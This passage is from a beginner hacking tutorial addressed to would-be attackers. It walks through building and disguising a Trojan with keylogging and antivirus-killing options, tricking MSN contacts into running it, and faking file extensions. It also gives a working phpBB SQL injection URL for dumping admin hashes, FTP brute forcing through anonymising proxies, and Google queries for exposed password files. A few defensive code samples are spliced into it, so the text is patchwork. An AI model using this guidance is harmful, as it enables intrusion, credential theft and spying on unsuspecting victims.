Port: What port will the Trojan listen on.

Name: Name of Victim or what ever you want to name Trojan server.

Password: The password you want to use for connecting to the server or editing it.

Start Up: Each time their computer restarts the Trojan server is closed; on reboot, how do you want the Trojan server to start back up again? Best to tick all the options in case one or more of them fails.

Install Name/Install Path: The file name of the server and/or where you want to install your Trojan server to on the victim’s computer.

Install Directory Windows or System Folder: Do you want your Trojan to install itself to the Windows folder or system folder?

Server Icon: What icon do you want your Trojan server to have?

Melt Server: When the victim clicks on the Trojan server do you want it to delete itself after it has copied itself to the WINDOWS folder or wherever?

Fake Error Message: A Message that will come up on the victim’s computer when they click on the server. The victim is tricked into thinking the file you sent them has an error in it.

Kill AV/FW: Do you want the server to try and stop Anti-Virus and Firewalls from running on the remote computer?

ICQ Notify: If you have an ICQ number and you use ICQ put your number in there, and when the victim's computer connects to the Internet it will send you a pager message with the victim's IP Address and other details so you can connect to them with a Trojan.

SMTP Server: If you're going to use Email Notify then you will need an SMTP server for the Trojan to connect to so it can send you an email with information in it; if you have an email address you want the information sent to, search on Google for its SMTP server, e.g. "Yahoo SMTP Server", and you should find the SMTP server address for it.

Email Address: What email address do you want the victim's IP Address and such sent to?

SiN Port: Don’t worry about it, don’t bother using SiN notify it’s too risky, you might get busted.

Make Server Visible: The server will be visible and the victim will be able to exit it, only good if you’re testing the server on your computer.

Enable Offline Keylogger: Log the keys the victim types, so when you connect you can retrieve them.

Only Open Port When Online: The Trojan will only start listening for connections if the victim’s computer is connected to the Internet.

Inject Into Explorer.exe: Do you want the server to inject itself into Windows Explorer, so it's invisible to the task manager and bypasses firewalls by going through Windows Explorer? Note: Injected Trojan servers are a lot harder to remove than normal.

Direct Or Reverse Connection: Set it to Direct connection; reverse connection is when the server connects to the Client, and this is normally used if the victim is behind a or is on a LAN. To use reverse connect your IP Address must always stay the same or you must use some sort of DNS software. You're a beginner, don't worry about reverse connection, it's too risky anyway.

Build Server/Save Server: Make your Trojan server.

After you have made your Trojan server, it's time to try and trick someone into accepting it and clicking on it. The best way to do this is just to get someone off your MSN list, then say something like, hey I got this cool screensaver do you want it, then send the file; they click on it and then you can connect to them using your Trojan client and control their computer. That's basically it for Trojans; remember using someone else's Trojan is NOT hacking, I do not recommend you get stuck into using other people's Trojans and such, you will only be a stupid script kiddie.

FAKING/HIDING EXTENSIONS:

I have seen people on many forums asking how to fake an extension; the reason (I assume) most people want to do this is so they can send someone a trojan or virus and make it look like a safe file type. Most people with advanced computer knowledge will not accept executable files from people they don't know, and for good reason: they have no idea what the file will do when it is executed. For those of you who don't know, executable files are files that don't need any other program to run; they can run independently. Some executable file types are:

*.exe *.pif *.bat *.com *.vbs *.scr

Some safe files types are:

*.jpg *.jpeg *.mpg *.mpeg *.avi *.wmv *.bmp *.wav *.mp3 *.wma *.gif *.png *.doc *.txt *.pdf

Although all of the above file types are generally safe, you must remember that every now and then (not often) vulnerabilities are found in software like Adobe Acrobat Reader where an attacker can hide code inside the file and then execute it. The key thing to remember is NOT to accept files from people you do not know, no matter what the extension, and to make sure when you are accepting files from a friend that you know for sure that the person you're talking to or opening an email from is actually your friend and not someone who has managed to forge his email address or guess his IM password.

Below are some methods you can use to hide or fake an extension; remember these don't actually make it so you can turn an exe into a jpeg and execute it properly, all they are is methods you can use to deceive the average person with.

1. Name your file mypicture.jpg.exe

2. Name your file mypicture.jpg .exe

(Put a large space between .jpg and .exe)

3. Open up WordPad, and drag your .exe file into it.

   1. Right click on Server.exe
   2. Go to Package Object
   3. Then Edit Package
   4. If you wish you can insert a custom icon
   5. Go to Edit then Copy Package
   6. Go to your Desktop and press CTRL + V
   7. Rename your file to example.jpg or example.mpg

You may wonder why this hides the extension; the reason is that by default Windows hides the .shs extension, and this is what your file has now been converted to. I believe MSN does not allow you to send .shs files.
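From the other side, here is an added Python example (not from the original text) of the check a mail or file-transfer gateway could run on an incoming file name to catch the three tricks above: the double extension, the run of spaces before the real extension, and a .shs scrap object hiding behind a renamed file. The extension lists are the ones printed in this section; the sample names are constructed.

```python
# Executable types listed above, plus .shs, the scrap-object type the WordPad trick produces.
EXECUTABLE = {"exe", "pif", "bat", "com", "vbs", "scr", "shs"}
# "Safe" types listed above; a file that ends up executable after one of these is a decoy.
SAFE_LOOKING = {"jpg", "jpeg", "mpg", "mpeg", "avi", "wmv", "bmp", "wav", "mp3",
                "wma", "gif", "png", "doc", "txt", "pdf"}


def extensions(filename):
    """All dot-separated extensions of a name, lower-cased and with padding spaces removed."""
    parts = filename.strip().split(".")
    return [p.strip().lower() for p in parts[1:]] if len(parts) > 1 else []


def analyze(filename):
    """Classify a file name; returns (real_extension, is_executable, list_of_reasons)."""
    exts = extensions(filename)
    real = exts[-1] if exts else ""
    reasons = []
    if real in EXECUTABLE:
        reasons.append(f"executable type .{real}")
        # mypicture.jpg.exe: Explorer hides known extensions, so only .jpg is visible
        decoys = [e for e in exts[:-1] if e in SAFE_LOOKING]
        if decoys:
            reasons.append(f"double extension, shows as .{decoys[-1]} if .{real} is hidden")
        # "mypicture.jpg      .exe": the part before the last dot ends in whitespace
        stem = filename.strip().rsplit(".", 1)[0]
        if stem != stem.rstrip():
            reasons.append("whitespace padding pushes the real extension out of view")
    return real, real in EXECUTABLE, reasons


# Constructed names for the three tricks, plus two harmless ones.
SAMPLE_NAMES = [
    "mypicture.jpg.exe",
    "mypicture.jpg                                   .exe",
    "example.jpg.shs",  # what the renamed WordPad scrap object is really called on disk
    "holiday.jpg",
    "report.pdf",
]

if __name__ == "__main__":
    for name in SAMPLE_NAMES:
        real, is_exe, reasons = analyze(name)
        print(f"{name!r:60} .{real:4} {'BLOCK' if is_exe else 'ok':5} {'; '.join(reasons)}")
```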

OBTAINING IP ADDRESSES:

How to obtain a person's IP Address is a commonly asked question by beginners to Internet Security; below I will list ways you can use to get someone's IP Address.

1. Send the person a file or start a webcam session or audio conversation over your Instant Messaging program. Then open up Command Prompt and type netstat; this will print a list of DNS names, which is helpful because if you knew they were using AOL you would look for an AOL DNS name, e.g. pp134.1232.america.aol.com You can resolve this into an IP Address by. Before doing this make sure all other programs that are accessing the Internet are shut down so you do not have a whole list of DNS names to look through. If you wished to get a list of IP Addresses instead of just DNS names type netstat -n

2. Tell the person to ping you, then check your firewall to get their IP Address.

3. Ask the person to visit a website, e.g. http://youripaddress/ Some people may fall for this and try to go to that website; of course if you have a firewall, your firewall will log them trying to connect on Port 80. You could also use a URL Redirection service (I think) to make it easier to fool them, although it's possible you may get the IP Address of the URL Redirection service and not their IP.

4. Get the person to send you an email, then get their IP Address from the email. If you're using Outlook you can get their IP Address by viewing the properties of the email sent. If you're using Hotmail, before getting them to send the email go into your Hotmail options; somewhere there should be a section where you can set how much information on an email you can see, so when you get their email it will show their IP Address, their DNS name and some other information.

5. Go to http://statscounter.com and get a stats viewer for your website (which you will set up); after you have set up your stats viewer, log in to your stats4all account and have a look at the IP Addresses that have visited your website (after the person has visited your website, which of course will have your stats viewer on it.)

6. Open up Angry IP Scanner or another IP Scanner that shows the NetBIOS names of the computers it scans, and scan the person's IP Range looking for their NetBIOS name. If their IP Address last time you had it was 129.99.78.10 you would want to scan from 129.99.0.0 to 129.99.255.255

7. Ask the person for their IP Address, sometimes this may work, although I have never tried it myself.

8. Code a program and somehow manage to get it on their computer, e.g. by sending it to them and telling them it's something else; this program could send you their IP Address. If you're not a very good programmer you could simply make the program connect to your computer, and then you could get their IP Address from your firewall logs.

9. Get them to log onto some sort of server set up by you and then obtain their IP Address.

10. Ask an admin on a forum or something similar to give you their IP Address; IF you do have a legitimate reason for wanting their IP Address they may give it to you.

SHORT DoS FAQ:

What is Denial of Service? A DoS Attack is when an attacker uses another computer's bandwidth or CPU to max out the bandwidth and/or CPU of another computer/server. A DoS Attack is usually accomplished when an attacker floods a target server with garbage data which saturates the connection and uses up the target's bandwidth, therefore denying service to legitimate users trying to access the server. There are different levels of DoS attacks; below I have listed and explained them.

DoS:

A DoS attack is when the attacker launches an attack from his or her own computer; this is done by sending packets of data to the remote computer, and for each packet sent the target machine receives one. This is a very uncommon form of denial of service because the attack most of the time is very unsuccessful and at times can be easily traced. DoS attacks are usually carried out by amateur script kiddies who have no idea what the “hacking tool” they're using actually does at all; they think they have a chance of taking down a web server just using their own computer, and most of the time the script kiddie finds out they're wrong and moves on to use another “hacking tool” or possibly uses tools to perform DDoS (Distributed Denial Of Service) attack(s).

DDoS:

DDoS (Distributed Denial of Service) attacks are the most common form of denial of service an attacker uses. If an attacker wishes to launch a Denial of Service attack, he infects thousands or even tens or hundreds of thousands of machines with a bot; usually this bot logs into an IRC chat room from the infected machine and waits for the attacker to give commands. The attacker then types in a command, for example “$flood ICMP www.yahoo.com”; the bots in the IRC room receive this command and send ICMP packets to the remote target, and because the attacker has so many bots and the bots are on fast servers the attack is often successful in shutting down the remote target or denying service to legitimate users trying to access that server.

Sometimes the attacker chooses to manually infect victims that he or she can use for attacks; the attacker usually does this by making an IRC bot that goes into IRC rooms and uses social engineering to get people to visit a website that exploits a security hole in Internet Explorer (generally Internet Explorer because it's so insecure) and downloads his bot onto their computer. Recently, building up a large “army” of bots to use for attacks has become quite easy; there are many bots on the Internet available for download such as Forbot, RxBot and Agobot. These bots spread by scanning the Internet for certain ports/services and attempting to exploit them and infect the remote computer; this type of spreading can be very useful when the bot is using a 0day exploit. DoS bots usually have standard flooding, such as ICMP, UDP, TCP, and SYN Flooding.

DRDoS:

DRDoS (Distributed Reflected Denial of Service) is quite an uncommon type of denial of service attack because usually it is not required to take down a large server, although it was used once by the infamous “Mafia Boy” who took down cnn.com, yahoo.com, amazon.com and ebay.com. DRDoS is when an attacker sets his bots to flood different intermediate hosts with spoofed packets; for example the attacker sets half his bots to flood yahoo.com with spoofed ICMP packets and half to flood ebay.com with spoofed ICMP packets. The spoofed packets look like they have come from microsoft.com, so yahoo.com and ebay.com unknowingly flood microsoft.com: because the source of these packets is spoofed, ebay.com and yahoo.com will reply to the spoofed source. For each packet the attacker sends to yahoo.com or ebay.com it's possible that yahoo.com or ebay.com may have thousands of machines behind the same IP Address, and each of these machines will reply to the spoofed ICMP packet, therefore amplifying the power of the attack greatly. Below I have inserted a diagram showing how DRDoS works.

Red Lines: Connections from the attacker's computer to the zombies' computers, which the attacker uses to tell the zombies to attack.

Blue Lines: Zombies sending spoofed ICMP packets; these ICMP packets look like they came from the Internet core router the attacker wishes to attack.

Green Lines: Each of the computers connected to ebay.com, yahoo.com, cnn.com and amazon.com replying to the spoofed ICMP packets, therefore flooding the Internet core router.

Note: I doubt very much someone would be able to use cnn.com or any other website like it as an intermediate host, however there are big networks out there that could be used for reflecting packets off.

A SHORT BUFFER OVERFLOW FAQ:

What is a Buffer Overflow? To put it simply, a Buffer Overflow is when an attacker sends/inputs data larger than what can be stored in the buffer of the receiving program. The extra data is then written past the buffer, and the attacker usually overwrites certain data in the program's memory (the return point checker, i.e. the function's saved return address) and places his own code to be executed, then executes it; usually the attacker will grant himself a shell which he could Telnet to. Example: You have a memory buffer that can hold 256 bytes, and information that is sent through a socket is larger than 256 bytes. What happens? The 256 bytes are filled up and the rest of the data is stored adjacent to the 256 bytes in memory; of course, if the attacker overwrites certain parts and manages to get his code executed, then big trouble could spawn from this. What an attacker usually does is overwrite the return point checker address, so when the function the program is currently in terminates (returns to the function that called it), the return point checker would point to a section in memory where the attacker has his code stored; the code would be executed and would have the same rights on the machine as the exploited program, and admins often make the mistake of running certain software, e.g. Apache, as root on their machines. The most common type of vulnerability in software would have to be the buffer overflow; nearly all software products out there have at one time or another suffered from buffer overflows, including Windows, Apache and numerous FTP programs. What do programmers do, or should I say what do some programmers do, in order to protect their coding from buffer overflows? Well, some use a compiler extension called StackGuard, which prevents "stack smashing" from occurring; others just make sure their program checks all data which is input to it to make sure it is not larger than a certain size, or whatever size the memory buffer is.
Program data is stored in a stack, just like a stack of books; pointers in the program contain the address of the piece of memory at the top of the stack, and the bottom of the stack is set at a fixed address in memory. I'm sorry if I haven't explained this section properly; I have a big problem sometimes with putting knowledge from my brain onto paper.
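The 256-byte example above, as an added illustration in C (not code from the original text): the unchecked copy that lets a longer message run past the buffer, beside a length-checked version that rejects oversized input before writing anything, which is the input check the last paragraph describes. The socket is stood in for by a hypothetical driver that builds a message of a given length.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* the 256-byte buffer from the example in the text */

/* The pattern the text warns about: whatever arrived on the socket is copied
 * into a fixed stack buffer with no length check, so a message longer than
 * BUF_SIZE runs past the buffer and on towards the saved return address.
 * Kept here only for contrast; nothing in this file calls it with a message
 * longer than BUF_SIZE. */
int store_unchecked(const char *message) {
    char buf[BUF_SIZE];
    strcpy(buf, message);                /* no bound on the copy: this is the bug */
    return (int)strlen(buf);
}

/* Hardened version: the length is compared against the buffer before a single
 * byte is written, and an oversized message is rejected rather than silently
 * truncated, so the caller can log it and drop the connection.
 * Returns the number of bytes stored, or -1 if the message does not fit. */
int store_checked(const char *message, size_t message_len) {
    char buf[BUF_SIZE];
    if (message_len >= BUF_SIZE)         /* >= keeps one byte for the terminator */
        return -1;
    memcpy(buf, message, message_len);
    buf[message_len] = '\0';
    return (int)message_len;
}

/* Hypothetical driver standing in for the socket: builds an n-byte message of
 * 'A's (a constructed input, not captured traffic) and hands it to the checked
 * store. */
int receive_checked(size_t n) {
    static char message[4096];
    if (n > sizeof message)
        return -1;
    memset(message, 'A', n);
    return store_checked(message, n);
}

int main(void) {
    printf("255 bytes -> %d\n", receive_checked(255));    /* fits: 255 */
    printf("256 bytes -> %d\n", receive_checked(256));    /* rejected: -1 */
    printf("1000 bytes -> %d\n", receive_checked(1000));  /* rejected: -1 */
    return 0;
}
```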

USING PASSWORD CRACKERS:

Below I will explain how to crack the following passwords:

1. DES
2. MD5
3. FTP

For the purpose of learning, let's find a DES-encrypted password to crack using Google: inurl:passwd.txt This is one of the search results I came across: iss:aeczIj3e6GLso (from internet.humboldt.k12.ca.us/issboard/passwd.txt)

Let's crack that, shall we? First we need a DES password cracker; John The Ripper can be downloaded from: http://www.openwall.com//john/b/john-16w.zip You can get a dictionary text file, or whatever you would like to call it, from: http://www.hackersplayground.org/cgi-bin/linkcount.cgi?site=papers&link=hackersplayground.org/wordlists/bigdict.zip

Or an even bigger one from: http://www.hackersplayground.org/cgi-bin/linkcount.cgi?site=papers&link=hackersplayground.org/wordlists/cracklib.zip

Once you have downloaded John The Ripper, unpack it, as well as one or both of the dictionary files you downloaded.

You can use John The Ripper by:

1. Open CMD.
2. Drag John.exe in there.
3. Put a space.
4. Put -wordfile:
5. Drag your dictionary file in there (the .txt file).
6. Put a space.
7. Make a .txt file with the encrypted password in it; in this case the encrypted password (including username) would be: iss:aeczIj3e6GLso
8. Drag the .txt file you made with the encrypted password in it into cmd, and press enter.

You should find the password was "admin", and of course the username was "iss".

Ok, now it is time to learn how to crack MD5-hashed passwords. You can download a good MD5 cracker from: http://www.oxid.it/downloads/ca_setup.exe

Where can we get an MD5 hash from? Well, one piece of software that utilizes MD5 hashing is phpBB, which in case you don't know is forum software. Let's get some MD5 hashes; we can do this using Google. Well, let me correct myself: we used to be able to use Google to do this, however if you type "Powered By phpBB 2.0.3" Google will not run the search query. That doesn't mean other search engines won't, though: go to http://altavista.com and type "Powered By phpBB 2.0.3".

AltaVista found 1,200,000 results. Not bad, hey? Out of all those forums, I would say at least 1 in 10 are going to be vulnerable; to find some vulnerable pages you might want to go a dozen pages back, because the chances are hackers have already defaced the first few pages of forums. Here is a phpBB exploit: http://example.com/phpBB/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*

Make sure you get the location of privmsg.php correct, because that is the module you wish to exploit. Once you have successfully gained an admin password hash it is time to crack it; although you could deface the forum by making a cookie with the MD5 hash inside, the point of this section of this text is not to teach you how to deface forums, rather to teach you how to crack an MD5 hash. An example of an MD5 hash is: 21232f297a57a5a743894a0e4a801fc3

For the sake of learning how to crack MD5 passwords, let's just crack the hash I have given you using the MD5 cracker you downloaded. Open up Cain and Abel: this is the screen where you need to be located. To insert the MD5 hash I gave you, right click, click Add to List, then type in the MD5 hash. Now it's finally time to crack the hash. Now that you have the hash listed, we are going to try a dictionary attack, but before we can do so we must pick a dictionary file. As you should be able to see, this is the screen where you select your dictionary file from; you can also choose some variations below. These alter the passwords tried on the MD5 hash, thus making the attack more likely to succeed, although it will take longer to crack the hash.

Now that you know how to crack encrypted passwords, I am going to teach you how to crack FTP passwords. The major difference between this and the other types of cracking is that the other types are cracking a local file; this, however, is cracking a remote FTP server. This is different because:

1. It's using a TCP/IP Connection using the FTP protocol to brute force the password remotely.

2. Some FTP servers are set up with anti-cracking software, so after trying a number of passwords your IP address will be banned and you will not be able to continue cracking (unless you change proxy).

3. Because you're making a connection to an FTP server, there is a chance of being caught while cracking.

For this text, I am going to teach you how to use a program called Brutus. You can download Brutus from: http://www.hoobie.net/brutus/brutus-aet2.zip

Above is a screenshot of Brutus; this is how you would want your program set up for FTP brute forcing. If you have read above you would have read that the default port for FTP is 21, which is why I have set Brutus to use that; unless you know FTP is on a different port don't bother changing it, and also note that not all web servers run FTP. Above I have highlighted an important part of Brutus: obviously if you're going to be using Brutus the chances are it's from your own computer, meaning your attack could be easily traced back to you, although I must note that admins that allow FTP brute forcing to take place probably wouldn't bother to try and trace you down after you launched an attack (especially if you live in another country). If you wish to get some good proxies I recommend: http://web-hack.ru http://checker.freeproxy.ru After you have got your desired proxy click Define and whack your relevant information into Brutus. After you have finished setting up Brutus simply press Start and watch Brutus work its magic; if you're on a decent ADSL connection and you're using a fast proxy you should be able to do 1 password a second or more, in other words 3,600 passwords an hour (if you're cracking at 1 password a second).
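The banning behaviour in point 2 above, as an added example that is not part of the original text: C code that tallies failed logins per client IP from vsftpd-style log lines (constructed samples, not real server output) and reports clients that reach a threshold, which is the check an admin would run to spot Brutus-style guessing in the server log.

```c
#include <stdio.h>
#include <string.h>

#define IP_LEN 16        /* dotted-quad IPv4 plus terminator */
#define MAX_CLIENTS 32   /* distinct client IPs tracked */

/* Constructed sample in vsftpd's log style (not output captured from a real
 * server): one client cycles through usernames, another logs in normally. */
static const char *const sample_log[] = {
    "Sat Jun 11 22:10:01 2005 [pid 2011] [anonymous] FAIL LOGIN: Client \"203.0.113.9\"",
    "Sat Jun 11 22:10:02 2005 [pid 2011] [admin] FAIL LOGIN: Client \"203.0.113.9\"",
    "Sat Jun 11 22:10:03 2005 [pid 2011] [administrator] FAIL LOGIN: Client \"203.0.113.9\"",
    "Sat Jun 11 22:10:03 2005 [pid 2015] [bob] FAIL LOGIN: Client \"198.51.100.4\"",
    "Sat Jun 11 22:10:04 2005 [pid 2011] [root] FAIL LOGIN: Client \"203.0.113.9\"",
    "Sat Jun 11 22:10:05 2005 [pid 2015] [bob] OK LOGIN: Client \"198.51.100.4\"",
    "Sat Jun 11 22:10:06 2005 [pid 2011] [webmaster] FAIL LOGIN: Client \"203.0.113.9\"",
};
#define SAMPLE_LOG_LINES (sizeof sample_log / sizeof sample_log[0])

struct client_fail {
    char ip[IP_LEN];
    int failures;
};

/* If the line records a failed login, copy the client IP into ip and return 1;
 * anything else (successful logins, unrelated lines, malformed IPs) returns 0. */
int parse_failed_login(const char *line, char ip[IP_LEN]) {
    static const char marker[] = "FAIL LOGIN: Client \"";
    const char *start = strstr(line, marker);
    if (start == NULL)
        return 0;
    start += sizeof marker - 1;
    const char *end = strchr(start, '"');
    if (end == NULL || end == start || (size_t)(end - start) >= IP_LEN)
        return 0;                        /* malformed: do not trust it */
    memcpy(ip, start, (size_t)(end - start));
    ip[end - start] = '\0';
    return 1;
}

/* Tally failed logins per client IP. Returns the number of distinct clients
 * recorded; the table is filled in order of first appearance and is never
 * written past max_clients entries. */
size_t tally_failures(const char *const *lines, size_t n,
                      struct client_fail table[], size_t max_clients) {
    size_t used = 0;
    for (size_t i = 0; i < n; i++) {
        char ip[IP_LEN];
        if (!parse_failed_login(lines[i], ip))
            continue;
        size_t j;
        for (j = 0; j < used; j++)
            if (strcmp(table[j].ip, ip) == 0)
                break;
        if (j == used) {
            if (used == max_clients)
                continue;                /* table full: drop rather than overflow */
            strcpy(table[used].ip, ip);  /* ip already bounded by IP_LEN */
            table[used].failures = 0;
            used++;
        }
        table[j].failures++;
    }
    return used;
}

/* Number of clients in the sample with at least `threshold` failed logins. */
int count_brute_forcers(int threshold) {
    struct client_fail table[MAX_CLIENTS];
    size_t seen = tally_failures(sample_log, SAMPLE_LOG_LINES, table, MAX_CLIENTS);
    int offenders = 0;
    for (size_t i = 0; i < seen; i++)
        if (table[i].failures >= threshold)
            offenders++;
    return offenders;
}

/* IP of the first client in the sample to reach the threshold, or NULL. */
const char *first_brute_forcer(int threshold) {
    static struct client_fail table[MAX_CLIENTS];
    size_t seen = tally_failures(sample_log, SAMPLE_LOG_LINES, table, MAX_CLIENTS);
    for (size_t i = 0; i < seen; i++)
        if (table[i].failures >= threshold)
            return table[i].ip;
    return NULL;
}

int main(void) {
    const char *ip = first_brute_forcer(3);
    printf("%d client(s) at 3+ failed logins; first: %s\n",
           count_brute_forcers(3), ip ? ip : "none");
    return 0;
}
```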

PROXIES AND ANONYMITY:

So what is a proxy? Well, a proxy is a remote computer that has been set up so that you can connect to it and run all your programs through it so that your IP address is hidden. The way it works is that you connect to the proxy and tell it what you want to do, e.g. load a webpage; it loads the webpage, then sends the webpage back to you, so your IP address is hidden. So how can you use a proxy? Below is a screenshot of where to put the proxy address and the port it uses:

Ok, so now you know where to put the proxy server you plan to use to hide your IP address, but where can you get one? Search on Google for public proxies; before long you should find a site with a list. Try each one; remember some proxies do not work, either because they're offline or because too many people are connected to them already, so you have to find another one if the one you try isn't working. Remember HTTP proxies only work with HTTP, FTP proxies only work with FTP, you get the picture. So now you know how to cover your IP address when visiting websites, although I must note one thing: most public proxies keep logs, so if you do anything illegal you will most probably be tracked down. Now that you know how to cover your IP address when visiting websites, I'm sure you would like to know how to cover your IP address when using "hacking" programs and such? Well, to do this you need a program called SocksCap, which can be downloaded from: With SocksCap you can make just about any program that uses TCP or UDP connections route all its networking calls through a SOCKS server. If you want some proxies go to the following websites: http://stayinvisible.com Use only highly anonymous proxies, and try to use the ones in fucked up countries such as Brazil, Argentina, Turkey and so on. http://web-hack.ru has some real good proxies; not only are they fast, but if you whois them you can't get any info on them, meaning the feds will have a hard time tracking you down. BTW Web Hack is a Russian website, so you might want to use some sort of translator, e.g. AltaVista. For those of you who want to chain proxies, you can do so by putting them one after another in the box where you put your proxies, e.g. 202.61.176.55:80 202.234.12.87:3128 211.55.44.33:8080 You can chain a maximum of 3 proxies; don't ask me why that is, that's just the way retarded Windows works, isn't it?
If you wish to chain proxies, in your web browser you can do: 202.61.176.55:80 202.234.12.87:3128 http://google.com That's basically it for the anonymity section; remember chaining proxies does not ensure that you are 100% anonymous. Sometimes websites are able to get your IP address by using a Java applet. You can disable Java by going to Internet Options, then Security, then highlight Internet, then go to Custom Settings, then set it to High; below is a diagram showing you how to change the settings. You may notice when setting your security level this high that you may not be able to do certain things, however it will disable Java so they won't be able to trace you using a Java applet.

GOOGLE HACKING:

Introduction:

It is possible to use Google for malicious purposes: Google can be used to find vulnerable files that are not meant to be made public, as well as outdated and insecure web-based software; obviously outdated software is usually full of vulnerabilities that can be easily exploited. The reason why Google can be used for hacking more than any other search engine is because of its search parameters, which I am going to detail below.

site:

By using the "site:" command you can search for pages within certain domains. Let's say we wanted to search for a news article on CNN: site:cnn.com George W Bush

The above command, when typed into Google, would search Google's database of CNN web pages for the phrase "George W Bush".

allintitle:

Using this Google command you can find phrases within the title of a website: allintitle:Web Admin

Using the above command we could search for pages with Web Admin in their title, which, if you haven't already guessed, might bring up some vulnerable pages.

intitle:

This is similar to allintitle; the only difference is that you can search for a phrase in a website's title as well as something within the website's page: intitle:Admin admin:d81jk123kl1231

The above command would search for pages with "Admin" in their titles and then would search the website's pages for admin:d81jk123kl1231. This is just an example, of course; this probably won't bring up anything interesting.

allinurl:

Using this command you can search for web pages that contain something in their URL, for example: allinurl:passwd.txt

This would search Google for all URLs that contain "passwd.txt". If you whack that into Google you should come up with something interesting, nothing much though.

inurl:

This of course is similar to allinurl; using this command you can search for a particular part of a URL as well as something within the page or file you're searching for. Example: inurl:password.ini Admin:ae80ajaakasdf

The above command would search for websites with password.ini in their URL and then search for Admin:ae80ajaakasdf inside of that file or page. There are some other Google commands, but I won't bother explaining them, since this is only a short tutorial on Google Hacking.

Now that you know about the Google commands, it is time to do some searching for vulnerable websites and files using these commands. Have you ever seen a defaced phpBB forum? The chances are that you have; SQL Injection vulnerabilities are discovered in phpBB every few months, and many people fail to upgrade or patch their board against the exploit that has been released. And guess what? We can use Google to find these forums that are vulnerable, using the following search query:

"Powered By phpBB 2.0.1 Copyright 2001, 2002"

Using the above search query, without even using any Google commands, we are able to find literally hundreds of thousands of vulnerable forums. Not impressed by the power of Google yet?

Using the above Google Hack you could hack a lot of forums, and I mean a lot; however, what if we wanted to narrow that down? By using the site: command we could narrow it down to a certain domain: site:gov "Powered By phpBB 2.0.1 Copyright 2001, 2002"

That would search for government websites running old versions of phpBB; you wouldn't expect Government servers to be running such insecure software, however Google shows us that some Government websites do indeed use outdated and insecure software. You may find sometimes when you type in a search query that Google will not allow you to do a search for it; this is because the query has been identified as a Google Hack, or whatever you would like to call it. If this is the case you may wish to change your query to something like "By phpBB 2.0.1" instead of "Powered By phpBB 2.0.1 Copyright 2001, 2002".

Now that you have played around with the "site:" command, let's try searching for different file types. For those of you who don't know, Microsoft FrontPage saves encrypted passwords as .pwd files, and yes! we can use Google in order to retrieve these. We could use any of the following queries:

filetype:pwd admin
filetype:pwd administrator
filetype:pwd administrators
filetype:pwd authors
filetype:pwd service

We could also use the inurl command to retrieve some interesting files:

inurl:admin.pwd
inurl:service.pwd
inurl:authors.pwd

Now that you know the basics of Google Hacking, I am going to list below some Google Hacks. Remember, if you alter these Google Hacks (use different commands and such) it is most likely you will get different and better results, therefore finding more vulnerable servers/files. I must say Google Hacking is hardly real hacking, although it can be fun, so enjoy!

Below is a list of Google Hacks:

_vti_inf.html service.pwd users.pwd authors.pwd administrators.pwd shtml.dll shtml.exe fpcount.exe default.asp showcode.asp sendmail.cfm getFile.cfm imagemap.exe test.bat msadcs.dll htimage.exe counter.exe browser.inc hello.bat default.asp\ dvwssr.dll cart32.exe add.exe index.jsp SessionServlet shtml.dll index.cfm page.cfm shtml.exe web_store.cgi shop.cgi upload.asp default.asp pbserver.dll phf test-cgi finger Count.cgi jj php.cgi php nph-test-cgi handler webdist.cgi webgais websendmail faxsurvey htmlscript perl.exe wwwboard.pl www-sql view-source campas aglimpse glimpse man.sh AT-admin.cgi AT-generate.cgi filemail.pl maillist.pl info2www files.pl bnbform.cgi survey.cgi classifieds.cgi wrap cgiwrap edit.pl perl names.nsf webgais dumpenv.pl test.cgi submit.cgi guestbook.cgi guestbook.pl cachemgr.cgi responder.cgi perlshop.cgi query w3-msql plusmail htsearch infosrch.cgi publisher ultraboard.cgi db.cgi formmail.cgi allmanage.pl ssi adpassword.txt redirect.cgi cvsweb.cgi login.jsp dbconnect.inc admin htgrep wais.pl amadmin.pl subscribe.pl news.cgi auctionweaver.pl .htpasswd acid_main.php access.log log.htm log.html log.txt logfile logfile.htm logfile.html logfile.txt logger.html stat.htm stats.htm stats.html stats.txt webaccess.htm wwwstats.html source.asp perl mailto.cgi YaBB.pl mailform.pl cached_feed.cgi global.cgi Search.pl build.cgi common.php show global.inc ad.cgi index.html~ index.php~ index.html.bak index.php.bak print.cgi register.cgi webdriver bbs_forum.cgi mysql.class sendmail.inc CrazyWWWBoard.cgi search.pl way-board.cgi webpage.cgi pwd.dat adcycle post-query help.cgi

INDEX BROWSING:

So what is Index Browsing? Well, Index Browsing is when you basically view the files of a web server; for those of you who don't know, this is indeed possible and it is very easy to do. Ever wanted to break into a website hosting a certain video or images you want (yes, I know your dirty little secret)? Well, it may be possible to get access to some of these files. Let's say you have the location of a picture file, http://example.com/images/jenna.jpg, and you know this is the URL of an image. What you could do is type http://example.com/images/ into your web browser and press enter; if the server you're trying to get into allows index browsing, you will get a listing of that directory. To my surprise, a hell of a lot of servers do indeed allow index browsing, and by default Apache supposedly allows Index Browsing. The fact is a lot of admins are lazy and don't bother to take precautions in order to stop Index Browsing from taking place. Have you got a target in mind? Well, I suggest viewing the source code of the front page of the website (Right Click, View Source); you should have a look at all the links in there. There is a chance, for example, that they may store those precious videos in the same location that they store some of the images or ads of their website, and all you need to do is visit http://example.com/private/videos/ What if you wanted to find websites that were vulnerable to Index Browsing? Well, using a Google Hack we can; simply open up Google and type "Index Of/" + "what ever"

Google would then search for pages that contain "Index Of/", which of course would be index pages. If you're wondering why I put "what ever" there, that's just an example; you would replace "what ever" with whatever you were looking for, and you never know, you might just get lucky. The chances are if the website allows Index Browsing it is quite insecure and sooner or later someone is going to break into it, so I suggest you use a proxy when Index Browsing, just in case someone gets write access to their files and defaces their web page or whatever.
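On the server side, the Apache setting that decides whether a directory such as /images/ lists its files, as an added example that is not from the original text (the document root path is assumed): the listing-enabled form beside the hardened one.

```apache
# As shipped in many old httpd.conf files: "Indexes" tells Apache to generate
# a directory listing for any directory that has no index file, which is
# exactly what makes http://example.com/images/ browsable.
<Directory "/var/www/html">
    Options Indexes FollowSymLinks
    AllowOverride None
</Directory>

# Hardened: the leading "-" removes Indexes, so a request for a directory
# with no index file gets a 403 Forbidden instead of the file list.
# FollowSymLinks is kept so normal serving is unchanged.
<Directory "/var/www/html">
    Options -Indexes +FollowSymLinks
    AllowOverride None
</Directory>

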